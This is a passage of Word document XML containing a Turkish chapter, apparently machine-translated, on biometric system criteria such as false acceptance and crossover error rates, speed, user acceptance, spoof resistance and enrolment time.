      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Yanlış Kabul Oranı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00400B62" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak, kayıtlı olmayan kişilerin veya sahtekârların otantik olarak kabul edildiği bir yüzde olarak ifade edilen oran, bir biyometrik sistem tarafından kayıtlı kişilerin sahte kabul oranı olarak adlandırılır. Yanlış kabul bazen Tip II hatası olarak adlandırılır. Bu, genellikle bir biyometrik erişim kontrol sistemi için en önemli hata olarak kabul edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc9978683"/>
      <w:bookmarkStart w:id="15" w:name="_Toc9979165"/>
      <w:r>
        <w:t>1.7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Çapraz Hata Oranı (CER)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu aynı zamanda eşit hata oranı olarak da adlandırılır ve genellikle yanlış reddetme oranı ve yanlış kabul oranının eşit olduğu bir yüzde olarak ifade edilen noktadır. Bu, biyometrik sistem doğruluğunun en önemli ölçüsü haline geldi. Tüm biyometrik sistemler hassasiyet ayarlama özelliğine sahiptir. Yanlış kabul istenmediğinde, sistem kayıt verileri ve giriş verilerinin (neredeyse) mükemmel eşleşmesini gerektirecek şekilde ayarlanabilir. Bu yapılandırmada test edilirse, (yanlış) sıfır yanlış kabul oranı elde etmek için sistem doğru bir şekilde ifade edilebilir. Yanlış reddedilme istenmiyorsa, bu sistem yalnızca kayıt verileriyle eşleşmeye yaklaşan girdi verilerini kabul etmek için yeniden </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ayarlanabilir. Bu konfigürasyonda test edilirse, sıfıra yakın bir reddetme oranı elde etmek için sistem doğru bir şekilde ifade edilebilir. Ancak,Gerçek şu ki biyometrik sistemler aynı anda sadece bir hassasiyet ayarında çalışabiliyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gerçek şu ki, sistem hassasiyeti yanlış kabulü en aza indirecek şekilde ayarlandığı zaman, yakından eşleşen veriler desteklenecek ve yanlış reddetme oranı belirgin şekilde artacaktır. Tersine, sistem hassasiyeti yanlış reddetmeleri en aza indirecek şekilde ayarlandığında, yanlış kabul oranı belirgin şekilde artacaktır. Böylece, yayınlanan (yani, doğru olan) veriler hikayenin sadece bir kısmını söyler. Alan işlemlerinde gerçek sistem doğruluğu kabul edilenden daha az olabilir. Bu, tek bir biyometrik sistem doğruluğu ölçüsü ihtiyacını yaratan durumdur. Çapraz hata oranı (CER), çeşitli sistemlerin performansını karşılaştırırken adil ve tarafsız olan tek bir ölçüm sağlar. Genel olarak, eşit hatayı üreten hassasiyet ayarı, sistemin ikinci çalışması için optimum olan ayara yakın olacaktır.Yüzde 2'lik bir CER sağlayan bir biyometrik sistem, yüzde 5'lik bir CER'ye sahip bir sis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>temden daha doğru olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc9978684"/>
      <w:bookmarkStart w:id="17" w:name="_Toc9979166"/>
      <w:r>
        <w:t>1.7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Hız ve verim oranı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hız ve verim oranı, en önemli biyometrik sistem özellikleridir. Hız, genellikle sistemin veri işleme yeteneği ile ilgilidir ve kabul etme veya reddetme kararının ne kadar hızlı bir şekilde telaffuz edildiği olarak ifade edilir. Aslında, tüm kimlik doğrulama prosedürüyle ilgilidir: sisteme adım atmak; kartın veya PIN'inin girilmesi (bir doğrulama sistemi ise); bir el veya numara ekleyerek, bir gözü hizalayarak, erişim kelimelerini söyleyerek veya bir isim imzalayarak fiziksel verileri girmek; veri dosyalarının işlenmesi ve eşleştirilmesi; kabul etme veya reddetme kararının bildirilmesi; ve eğer bir portal sistem ise, kapıdan geçerek ve kapanarak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel olarak kabul edilmiş standartlar, başlangıçtan karar vermeye kadar beş saniyelik bir sistem hızını içerir. Diğer bir standart, kapıdan altı ila on saniyeye / kişiye eşit olan altı ila on / dakikalık bir portal verimidir. Sadece son yıllarda biyometrik sistemler bu hız standartlarını karşılayabilecek hale geldi ve bugün bile bazı pazarlanan sistemler bu hızlılığı sürdürmüyor. Yavaş hız ve sonuçta ortaya çıkan bekleme hatları ve hareket gecikmeleri, biyometrik sistemlerin ve hatta biyometrik şirketlerin başarısızlığa uğramasına neden oldu.</w:t>
      </w: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pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc9978685"/>
      <w:bookmarkStart w:id="19" w:name="_Toc9979167"/>
      <w:r>
        <w:t>1.7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Kullanıcılara Kabul Edilebilirlik</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanması gereken insanlara sistemin kabul edilebilirliği, biraz fark edildi, ancak biyometrik tanımlama işlemlerinde giderek daha önemli bir faktör oldu. Başlangıçta, az sayıda sistem varken, çoğu yüksek güvenlikli ve az sayıda kullanıcının sistemleri kullanmak için yüksek bir teşviği vardı; kullanıcı kabulü çok az ilgi çekiyordu. Ayrıca, ekran baskısı ve el sistemlerinde çok az kullanıcı tehdidi görülmüştür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Biyometrik sistem kabulü, sistemi kullanması gerekenler - organizasyon yöneticileri ve herhangi bir sendika mevcutsa - hepsi korumaya ihtiyaç duyan </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>varlıklar olduğu konusunda hemfikir olduklarında, biyometrik sistem bu varlıklara erişimi etkin bir şekilde kontrol ettiğinde, sistem kullanımının kullanıcı sağlığı için tehlikeli olmadığı durumlarda ortaya çıkar. sistem kullanımı, personel hareketini uygunsuz bir şekilde engellemiyor ve üretimde gecikmelere neden olmuyor ve sistem, yönetimin kullanıcılar hakkında kişisel veya sağlık bilgisi toplamasını mümkün kılmıyor. Taraflardan biri sistemin başarısını veya kaldırılmasını etkileyebilir. İşbirlikçi olmayan kullanıcılar, açık veya gizli bir şekilde sistem ekipmanlarını tehlikeye atacak, hasar verebilecek veya sabote edeceklerdir. Birliğin biyometrik sistemin sözleşmelerine dahil edilmesinin maliyeti çok maliyetli olabilir. Dahası, yönetim, biyometrik sistemin faydalarından faydalanıp yararlanmadığına dair karar vermiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc9978686"/>
      <w:bookmarkStart w:id="21" w:name="_Toc9979168"/>
      <w:r>
        <w:t>1.8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve"> Biyometrik Organ ve Eylemin Tekliği</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometrik sistemlerin amacı, personelin pozitif tanımlanması olduğundan, bazı kuruluşlar (örneğin, hükümetin unsurları), yalnızca benzersiz (yani, dünyada yinelenmeyen) fiziksel özelliklere dayanan sistemler belirlemektedir. Bunun sebebi, tabanın benzersiz bir karakteristik olması durumunda, bir eşleşmenin, bunun doğru kişi olması ihtimalinin yüksek olduğu bir ifadeden ziyade pozitif bir tanımlaması olmasıdır. Biyometrik tanımlama için kullanılan sadece üç fiziksel özellik veya insan organı benzersizdir: etiket izi, gözün retinası (yani, göz küresinin arkasındaki kan damarı modeli) ve gözün irisi gözbebeği çevreleyen gözün renkli kısmında bulunan özellikler). Bu özellikler çilleri, halkaları, çukurları, şeritleri, damarları, ko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ronatları ve kriptoları içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc9978687"/>
      <w:bookmarkStart w:id="23" w:name="_Toc9979169"/>
      <w:r>
        <w:t>1.9</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t>. Sahteciliğe Karşı Direnç</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sahte girdi verilerini algılama veya reddetme yeteneği, yüksek güvenlik gereksinimlerini karşılayan bir biyometrik erişim kontrol sistemi için hayati öneme sahiptir. Bunlar, el veya parmak izi sistemlerinde ölen kişinin kauçuk, plastik veya hatta ellerinin veya parmaklarının kullanımını ve ses sistemlerine kopyalanmış veya kaydedilmiş girişleri içerir. James Bond veya Terminator ms lms gibi eğlence medyası, ölen (ya da otantik) kişilerin kafalarının ya da gözlerinin korunan varlıklara ya da bilgilere erişim elde etmek için gözlerinin kullanıldığı durumlarda sık sık güvenlik sisteminin başarısız olduğunu göstermiştir. Erken biyometrik tanımlayıcı doğrulama sistemlerinin çoğu, yüksek güvenlikli erişim kontrol uygulamaları için tasarlandığından, sahte girdi verilerinin tespit edilmemesi veya reddedilmemesi, çeşitli sistem veya organizasyon arızalarının nedeni idi. Sahte verilere direnç, yüksek kaliteli, yüksek hassasiyetli sistemler için bir kriter olmaya devam etmektedir.Bununla birlikte, biyometrik sistemlerin diğer yüksek güvenlikli olmayan tip uygulamalara yayılması, sahteciliğe karşı direnç eksikliğinin gelecekte bir sistemin bozulmasına neden olmayacağı anlamına gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc9978688"/>
      <w:bookmarkStart w:id="25" w:name="_Toc9979170"/>
      <w:r>
        <w:t>1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t>. Güvenilirlik</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometrik tanımlayıcı doğrulama sistemlerinin sürekli ve doğru operasyonda kalması hayati öneme sahiptir. Sistem, performans doğruluğu veya hızında bozulma veya bozulma olmadan diğerlerinin önüne geçerken yetkili kişilerin erişmesine izin vermelidir. Ek olarak, bu performans standartları, yüksek düzeyde bakım veya sık teşhis ve sistem ayarları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yapılmadan sürdürülmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc9978689"/>
      <w:bookmarkStart w:id="27" w:name="_Toc9979171"/>
      <w:r w:rsidRPr="00B44DDA">
        <w:lastRenderedPageBreak/>
        <w:t>1.11. Data Storage Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44DDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Veri depolama gereksinimleri, depolama ortamının çok pahalı olduğu önceki biyometrik sistemlerden çok daha az önemli bir konudur. Bununla birlikte, biyometrik veri dosyalarının büyüklüğü ilgi konusu olmaya devam etmektedir. Mevcut ultra yüksek hızlı işlemcilerde bile, büyük veri dosyalarının küçük dosyalardan daha uzun sürmesi, özellikle de tam tanımlama yapan ve giriş veri tabanındaki veri tabanındaki her bir dosyayla eşleşen sistemlerde daha uzun sürebilir. Biyometrik dosya boyutu 9 ila 10,000 bayt arasında değişmekte olup, çoğu 256 ila 1000 bayt arasında değişmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc9978690"/>
      <w:bookmarkStart w:id="29" w:name="_Toc9979172"/>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve">1.11. </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6EE5">
        <w:t>Kayıt Süresi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6EE5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kayıt süresi de günümüzde daha az önemli bir faktördür. Erken biyometrik sistemler bazen çok fazla tekrar gerektiren ve tamamlanması birkaç dakika gerektiren kayıt prosedürlerine sahipti. İki dakika yerine beş dakikalık bir kayıt gerektiren bir sistem, 1000 kullanıcı kayıt yaptırması gerekiyorsa 50 saatlik pahalı olmayan üretken zamana neden olur. Ayrıca, bekleme süresi göz önüne alındığında, maliyet birkaç kez artar. Kayıt süresi için kabul edilen standart kişi başına iki dakikadır. Bugün piyasadaki sistemlerin çoğu bu standarda uygundur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc9978691"/>
      <w:bookmarkStart w:id="31" w:name="_Toc9979173"/>
      <w:r w:rsidRPr="00B44DDA">
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B5016">
        <w:t>Veri Toplamanın Saldırganlığı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B5016">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Başlangıçta, bu faktör, vücudun içinden biyometrik verilerin toplanmasına ilişkin kaygılar nedeniyle, özellikle de göz küresinin içindeki retina nedeniyle geliştirilmiştir. Erken sistemler retinayı kırmızı ışık ışınıyla aydınlattı. Bununla birlikte, bu durum, lazerlerin halkın bilinçlendirilmesiyle aynı zamana denk gelmekte olup, bazen kırmızı ışık demeti çelik kesmektedir. Hiçbir zaman retina taramasından kaynaklanan bir kullanıcı yaralanması iddiası olmamasına rağmen, kullanıcı hassasiyeti, vücudun içine giren herhangi bir girintiyi içerecek şekilde vücuda giren kırmızı ışıklara dirençten genişledi. Bu kullanıcı hassasiyeti şimdi algılanan kişisel alana yapılan izinsiz girişlerle ilgili endişeleri artırdı.</w:t>
      </w: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pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc9978692"/>
      <w:bookmarkStart w:id="33" w:name="_Toc9979174"/>
      <w:r w:rsidRPr="00B44DDA">
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44DDA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00414D7D">
        <w:t>Konu ve Sistem Temas Gereksinimleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu faktör muhtemelen bir sonraki adım veya müdahaleci olmanın devamı olarak düşünülebilir. Endikasyonlar, biyometrik sistem kullanıcılarının yüzlerce başka bilinmeyen kişinin (kendilerine) biyometrik veri toplama için temas kurmaları gereken yüzeylerle fiziksel temasta bulunma zorunluluğuna giderek daha duyarlı hale geldiğidir. Bu kaygılar, dudaklara yakın bir el cihazında tutmayı ve konuşmayı gerektiren ses sistemlerini içerir. “Bir şeyi yapmayı seçersem sorun değil, bir kuruluş veya toplum aynı şeyi yapmamı isterse, yanlış olduğunu” hissediyor gibi görünen bir kullanıcı var gibi görünüyor. Bunun anlamlı olup olmadığı. Biyometrik sistemlerin kullanımı üzerinde etkisi olan toplumda yayılan bir tutum. Video kamera veri toplama kullanan sistemler bu kategoriye girmez.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc9978693"/>
      <w:bookmarkStart w:id="35" w:name="_Toc9979175"/>
      <w:r w:rsidRPr="00792126">
        <w:lastRenderedPageBreak/>
        <w:t>1.13. Tarihsel Biyometrik Problemler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00792126">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Son 25 yılda biyometrik sistemlerin kullanımında çeşitli sorunlar tespit edilmiştir. Bazıları üstesinden gelinmiştir ve bugün nadiren görülürler; diğerleri hala meydana gelir. Bu problemler arasında performans, donanım ve yazılım sağlamlığı, bakım gereklilikleri, sabotaj duyarlılığı, kullanım nedeniyle algılanan sağlık sorunları, yönetime sunulan özel bilgiler ve sistemi kullanmak için gereken beceri ve işbirliği sayılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc9978694"/>
      <w:bookmarkStart w:id="37" w:name="_Toc9979176"/>
      <w:r w:rsidRPr="00952F9D">
        <w:t>1.14. Performans</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952F9D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
